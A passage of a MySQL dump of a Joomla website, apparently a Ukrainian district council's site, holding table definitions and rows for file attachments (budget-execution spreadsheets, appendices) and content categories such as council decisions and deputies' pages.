  `key` char(32) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The key for the association computed from an md5 on associated ids.',
  PRIMARY KEY (`context`,`id`),
  KEY `idx_key` (`key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_associations`
--

LOCK TABLES `fw3gt_associations` WRITE;
/*!40000 ALTER TABLE `fw3gt_associations` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_associations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_attachments`
--

DROP TABLE IF EXISTS `fw3gt_attachments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_attachments` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `filename` varchar(256) NOT NULL,
  `filename_sys` varchar(512) NOT NULL,
  `file_type` varchar(128) NOT NULL,
  `file_size` int(11) unsigned NOT NULL,
  `url` varchar(1024) NOT NULL DEFAULT '',
  `uri_type` enum('file','url') DEFAULT 'file',
  `url_valid` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `url_relative` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `url_verify` tinyint(1) unsigned NOT NULL DEFAULT '1',
  `display_name` varchar(80) NOT NULL DEFAULT '',
  `description` varchar(255) NOT NULL DEFAULT '',
  `icon_filename` varchar(20) NOT NULL,
  `access` int(11) NOT NULL DEFAULT '1',
  `state` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `user_field_1` varchar(255) NOT NULL DEFAULT '',
  `user_field_2` varchar(255) NOT NULL DEFAULT '',
  `user_field_3` varchar(255) NOT NULL DEFAULT '',
  `parent_type` varchar(100) NOT NULL DEFAULT 'com_content',
  `parent_entity` varchar(100) NOT NULL DEFAULT 'article',
  `parent_id` int(11) unsigned DEFAULT NULL,
  `created` datetime DEFAULT NULL,
  `created_by` int(11) NOT NULL,
  `modified` datetime DEFAULT NULL,
  `modified_by` int(11) NOT NULL,
  `download_count` int(11) unsigned DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=698 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_attachments`
--

LOCK TABLES `fw3gt_attachments` WRITE;
/*!40000 ALTER TABLE `fw3gt_attachments` DISABLE KEYS */;
INSERT INTO `fw3gt_attachments` VALUES (681,'КАЛЕНДАРНИЙ ПЛАН ДОГЛЯДУ ЗА САДОМ.doc','/sata2/home/users/malehus/www/www.malehus.in.ua/attachments/article/2454/КАЛЕНДАРНИЙ ПЛАН ДОГЛЯДУ ЗА САДОМ.doc','application/msword',49664,'attachments/article/2454/КАЛЕНДАРНИЙ ПЛАН ДОГЛЯДУ ЗА САДОМ.doc','file',0,0,0,'календарний план','','word.gif',1,1,'','','','com_content','article',2454,'2020-08-30 15:12:26',430,'2020-08-30 15:12:26',430,0),(683,'dod 10.doc','/sata2/home/users/malehus/www/www.malehus.in.ua/attachments/article/2475/dod 10.doc','application/msword',44544,'attachments/article/2475/dod 10.doc','file',0,0,0,'додаток 10','','word.gif',1,1,'','','','com_content','article',2475,'2020-09-29 17:40:13',430,'2020-09-29 17:40:13',430,0),(684,'dod17.doc','/sata2/home/users/malehus/www/www.malehus.in.ua/attachments/article/2475/dod17.doc','application/msword',51712,'attachments/article/2475/dod17.doc','file',0,0,0,'додаток 17','','word.gif',1,1,'','','','com_content','article',2475,'2020-09-29 17:40:35',430,'2020-09-29 17:40:35',430,0),(685,'dohod 9m2020.xls','/sata2/home/users/malehus/www/www.malehus.in.ua/attachments/article/2481/dohod 9m2020.xls','application/vnd.ms-excel',53248,'attachments/article/2481/dohod 9m2020.xls','file',0,0,0,'виконання за 9 місяців 2020','','excel.gif',1,1,'','','','com_content','article',2481,'2020-10-15 14:47:22',430,'2020-10-15 14:47:22',430,0),(693,'виконання за три місяці.xls','/sata2/home/users/malehus/www/www.malehus.in.ua/attachments/article/2508/виконання за три місяці.xls','application/vnd.ms-excel',62976,'attachments/article/2508/виконання за три місяці.xls','file',0,0,0,'виконання за 3 місяці 2021','','excel.gif',1,1,'','','','com_content','article',2508,'2021-04-17 12:55:05',430,'2021-04-17 12:55:05',430,0),(694,'vuk5_21.xls','/sata2/home/users/malehus/www/www.malehus.in.ua/attachments/article/2520/vuk5_21.xls','application/vnd.ms-excel',61952,'attachments/article/2520/vuk5_21.xls','file',0,0,0,'виконання за 5 місяців 2021','','excel.gif',1,1,'','','','com_content','article',2520,'2021-06-17 18:48:10',430,'2021-06-17 18:48:10',430,0),(695,'dox_6m21.xls','/sata2/home/users/malehus/www/www.malehus.in.ua/attachments/article/2529/dox_6m21.xls','application/vnd.ms-excel',60928,'attachments/article/2529/dox_6m21.xls','file',0,0,0,'виконання за 6 місяців 2021','','excel.gif',1,1,'','','','com_content','article',2529,'2021-07-15 12:08:44',430,'2021-07-15 12:08:44',430,0),(696,'vukdox_1121.xls','/sata2/home/users/malehus/www/www.malehus.in.ua/attachments/article/2537/vukdox_1121.xls','application/vnd.ms-excel',50688,'attachments/article/2537/vukdox_1121.xls','file',0,0,0,'виконання за 11 місяців 2021','','excel.gif',1,1,'','','','com_content','article',2537,'2021-12-15 10:04:14',430,'2021-12-15 10:04:14',430,0),(697,'dohod21r.xls','/sata2/home/users/malehus/www/www.malehus.in.ua/attachments/article/2542/dohod21r.xls','application/vnd.ms-excel',52736,'attachments/article/2542/dohod21r.xls','file',0,0,0,'виконання за 2021 рік','','excel.gif',1,1,'','','','com_content','article',2542,'2022-01-17 13:45:24',430,'2022-01-17 13:45:24',430,0);
/*!40000 ALTER TABLE `fw3gt_attachments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_banner_clients`
--

DROP TABLE IF EXISTS `fw3gt_banner_clients`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_banner_clients` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `contact` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `email` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `extrainfo` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `own_prefix` tinyint(4) NOT NULL DEFAULT '0',
  `metakey_prefix` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `purchase_type` tinyint(4) NOT NULL DEFAULT '-1',
  `track_clicks` tinyint(4) NOT NULL DEFAULT '-1',
  `track_impressions` tinyint(4) NOT NULL DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `idx_own_prefix` (`own_prefix`),
  KEY `idx_metakey_prefix` (`metakey_prefix`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_banner_clients`
--

LOCK TABLES `fw3gt_banner_clients` WRITE;
/*!40000 ALTER TABLE `fw3gt_banner_clients` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_banner_clients` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_banner_tracks`
--

DROP TABLE IF EXISTS `fw3gt_banner_tracks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_banner_tracks` (
  `track_date` datetime NOT NULL,
  `track_type` int(10) unsigned NOT NULL,
  `banner_id` int(10) unsigned NOT NULL,
  `count` int(10) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`track_date`,`track_type`,`banner_id`),
  KEY `idx_track_date` (`track_date`),
  KEY `idx_track_type` (`track_type`),
  KEY `idx_banner_id` (`banner_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_banner_tracks`
--

LOCK TABLES `fw3gt_banner_tracks` WRITE;
/*!40000 ALTER TABLE `fw3gt_banner_tracks` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_banner_tracks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_banners`
--

DROP TABLE IF EXISTS `fw3gt_banners`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_banners` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `cid` int(11) NOT NULL DEFAULT '0',
  `type` int(11) NOT NULL DEFAULT '0',
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `imptotal` int(11) NOT NULL DEFAULT '0',
  `impmade` int(11) NOT NULL DEFAULT '0',
  `clicks` int(11) NOT NULL DEFAULT '0',
  `clickurl` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `description` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `custombannercode` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `sticky` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `own_prefix` tinyint(1) NOT NULL DEFAULT '0',
  `metakey_prefix` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `purchase_type` tinyint(4) NOT NULL DEFAULT '-1',
  `track_clicks` tinyint(4) NOT NULL DEFAULT '-1',
  `track_impressions` tinyint(4) NOT NULL DEFAULT '-1',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `reset` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `idx_state` (`state`),
  KEY `idx_own_prefix` (`own_prefix`),
  KEY `idx_banner_catid` (`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_metakey_prefix` (`metakey_prefix`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_banners`
--

LOCK TABLES `fw3gt_banners` WRITE;
/*!40000 ALTER TABLE `fw3gt_banners` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_banners` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_categories`
--

DROP TABLE IF EXISTS `fw3gt_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0',
  `lft` int(11) NOT NULL DEFAULT '0',
  `rgt` int(11) NOT NULL DEFAULT '0',
  `level` int(10) unsigned NOT NULL DEFAULT '0',
  `path` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `extension` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'The meta description for the page.',
  `metakey` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'The meta keywords for the page.',
  `metadata` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'JSON encoded metadata properties.',
  `created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `cat_idx` (`extension`,`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_left_right` (`lft`,`rgt`),
  KEY `idx_language` (`language`),
  KEY `idx_path` (`path`(100)),
  KEY `idx_alias` (`alias`(100))
) ENGINE=InnoDB AUTO_INCREMENT=138 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_categories`
--

LOCK TABLES `fw3gt_categories` WRITE;
/*!40000 ALTER TABLE `fw3gt_categories` DISABLE KEYS */;
INSERT INTO `fw3gt_categories` VALUES (1,0,0,0,183,0,'','system','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',0,'2009-10-18 16:07:09',0,'0000-00-00 00:00:00',0,'*',1),(2,27,1,1,2,1,'uncategorised','com_content','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:26:37',0,'0000-00-00 00:00:00',0,'*',1),(3,28,1,3,4,1,'uncategorised','com_banners','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:27:35',0,'0000-00-00 00:00:00',0,'*',1),(4,29,1,5,6,1,'uncategorised','com_contact','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:27:57',0,'0000-00-00 00:00:00',0,'*',1),(5,30,1,7,8,1,'uncategorised','com_newsfeeds','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:28:15',0,'0000-00-00 00:00:00',0,'*',1),(6,31,1,9,10,1,'uncategorised','com_weblinks','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:28:33',0,'0000-00-00 00:00:00',0,'*',1),(7,32,1,11,12,1,'uncategorised','com_users','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:28:33',0,'0000-00-00 00:00:00',0,'*',1),(8,36,1,13,14,1,'novini-2','com_content','головна','novini-2','','			',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 18:36:35',430,'2020-08-30 16:01:50',0,'*',1),(9,37,1,15,26,1,'2010-06-05-12-55-45','com_content','Відомості про район','2010-06-05-12-55-45','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(12,40,9,16,17,2,'2010-06-05-12-55-45/2010-06-06-03-57-58','com_content','Істричний нарис','2010-06-06-03-57-58','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(14,42,9,18,19,2,'2010-06-05-12-55-45/2010-06-06-09-34-01','com_content','Відеоогляд','2010-06-06-09-34-01','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(15,43,9,20,21,2,'2010-06-05-12-55-45/---1932-33-','com_content','Малинщина та Голодомор 1932-33 рр.','---1932-33-','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(16,44,1,27,56,1,'deputatska-storinka','com_content','Депутатська сторінка','deputatska-storinka','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(17,45,16,28,29,2,'deputatska-storinka/2010-06-05-12-51-34','com_content','Депутати райради','2010-06-05-12-51-34','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(18,46,16,30,31,2,'deputatska-storinka/2010-06-07-09-15-05','com_content','Регламент ради','2010-06-07-09-15-05','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(19,47,16,32,33,2,'deputatska-storinka/2010-06-05-12-51-18','com_content','Президія ради','2010-06-05-12-51-18','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(20,48,16,34,35,2,'deputatska-storinka/2010-06-05-12-50-56','com_content','Керівництво ради','2010-06-05-12-50-56','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(21,49,16,36,37,2,'deputatska-storinka/2010-06-05-12-50-39','com_content','Виконавчий апарат','2010-06-05-12-50-39','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(22,50,16,38,39,2,'deputatska-storinka/2010-06-06-10-55-25','com_content','Звітність','2010-06-06-10-55-25','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(23,51,16,40,41,2,'deputatska-storinka/2010-06-07-07-54-47','com_content','Звернення громадян','2010-06-07-07-54-47','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(24,52,16,42,43,2,'deputatska-storinka/2010-06-07-09-14-38','com_content','Закони України','2010-06-07-09-14-38','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(25,53,16,44,45,2,'deputatska-storinka/2010-06-07-09-43-24','com_content','Положення','2010-06-07-09-43-24','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(26,54,16,46,47,2,'deputatska-storinka/2011-03-31-12-03-04','com_content','Регуляторні акти','2011-03-31-12-03-04','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(27,55,16,48,49,2,'deputatska-storinka/publichna-informacija_2','com_content','Публічна інформація','publichna-informacija_2','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(28,56,1,57,140,1,'rishennja-radi','com_content','Рішення ради','rishennja-radi','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(29,57,28,60,139,2,'rishennja-radi/rishennja','com_content','Рішення','rishennja','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(60,88,16,50,51,2,'deputatska-storinka/2010-06-05-12-52-17','com_content','Постійні комісії','2010-06-05-12-52-17','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',430,'2014-09-17 16:41:01',0,'*',1),(61,89,1,141,142,1,'2010-06-05-13-46-44','com_content','Органи місцевого самоврядування','2010-06-05-13-46-44','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',430,'2014-09-16 09:36:35',0,'0000-00-00 00:00:00',0,'*',1),(62,946,1,143,144,1,'proekty-rishen','com_users','Проекти рішень','proekty-rishen','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2014-09-17 15:03:36',0,'0000-00-00 00:00:00',0,'*',1),(64,967,1,145,146,1,'administrator-sajtu','com_content','адміністратор сайту','administrator-sajtu','','<p>Ви можете написати листа адміністратору на <a href=\"mailto:malehus@ukr.net\">malehus@ukr.net</a></p><p><br></p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2014-09-19 15:22:33',430,'2020-08-30 10:30:40',0,'*',1),(65,973,28,58,59,2,'rishennja-radi/proekti-rishen','com_content','Проекти рішень','proekti-rishen','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2014-09-21 11:03:24',0,'0000-00-00 00:00:00',0,'*',1),(70,1209,16,52,53,2,'deputatska-storinka/ochishchennya-vladi','com_content','Очищення влади','ochishchennya-vladi','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2014-12-10 15:00:55',0,'0000-00-00 00:00:00',0,'*',1),(77,1463,29,61,62,3,'rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku','com_content','Рішення від 06.11.2015 року','rishennya-vid-18-09-2015-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2015-09-18 08:49:14',430,'2015-11-06 12:06:28',0,'*',1),(78,1513,29,63,64,3,'rishennja-radi/rishennja/rishennya-vid-13-11-2015-roku','com_content','Рішення від 13.11.2015 року','rishennya-vid-13-11-2015-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2015-11-13 09:12:47',0,'0000-00-00 00:00:00',0,'*',1),(79,1571,29,65,66,3,'rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku','com_content','Рішення від 23.12.2015 року','rishennya-vid-23-12-2015-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2015-12-25 18:40:14',0,'2015-12-25 18:40:14',0,'*',1),(81,1608,9,22,23,2,'2010-06-05-12-55-45/pochesni-gromadyani-rajonu','com_content','Почесні громадяни району','pochesni-gromadyani-rajonu','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2015-12-26 11:05:31',0,'2015-12-26 11:05:31',0,'*',1),(82,1609,9,24,25,2,'2010-06-05-12-55-45/fotogalereya','com_content','Фотогалерея','fotogalereya','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2015-12-26 12:15:35',430,'2015-12-26 12:15:38',0,'*',1),(83,1640,29,67,68,3,'rishennja-radi/rishennja/rishennya-vid-15-01-2016-roku','com_content','Рішення від 15.01.2016 року','rishennya-vid-15-01-2016-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-01-15 08:40:34',0,'2016-01-15 08:40:34',0,'*',1),(84,1699,29,69,70,3,'rishennja-radi/rishennja/rishennya-vid-25-03-2016-roku','com_content','Рішення від 25.03.2016 року','rishennya-vid-25-03-2016-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-03-25 10:35:51',0,'2016-03-25 10:35:51',0,'*',1),(85,1733,29,71,72,3,'rishennja-radi/rishennja/rishennya-vid-22-04-2016-roku','com_content','Рішення від 22.04.2016 року','rishennya-vid-22-04-2016-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-04-22 08:23:25',0,'2016-04-22 08:23:25',0,'*',1),(86,1748,29,73,74,3,'rishennja-radi/rishennja/rishennya-vid-13-05-2016-roku','com_content','Рішення від 13.05.2016 року','rishennya-vid-13-05-2016-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-05-13 09:37:11',0,'2016-05-13 09:37:11',0,'*',1),(87,1756,16,54,55,2,'deputatska-storinka/informuvannya-shchodo-konkursiv','com_content','Інформування щодо конкурсів','informuvannya-shchodo-konkursiv','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-05-18 05:26:59',0,'2016-05-18 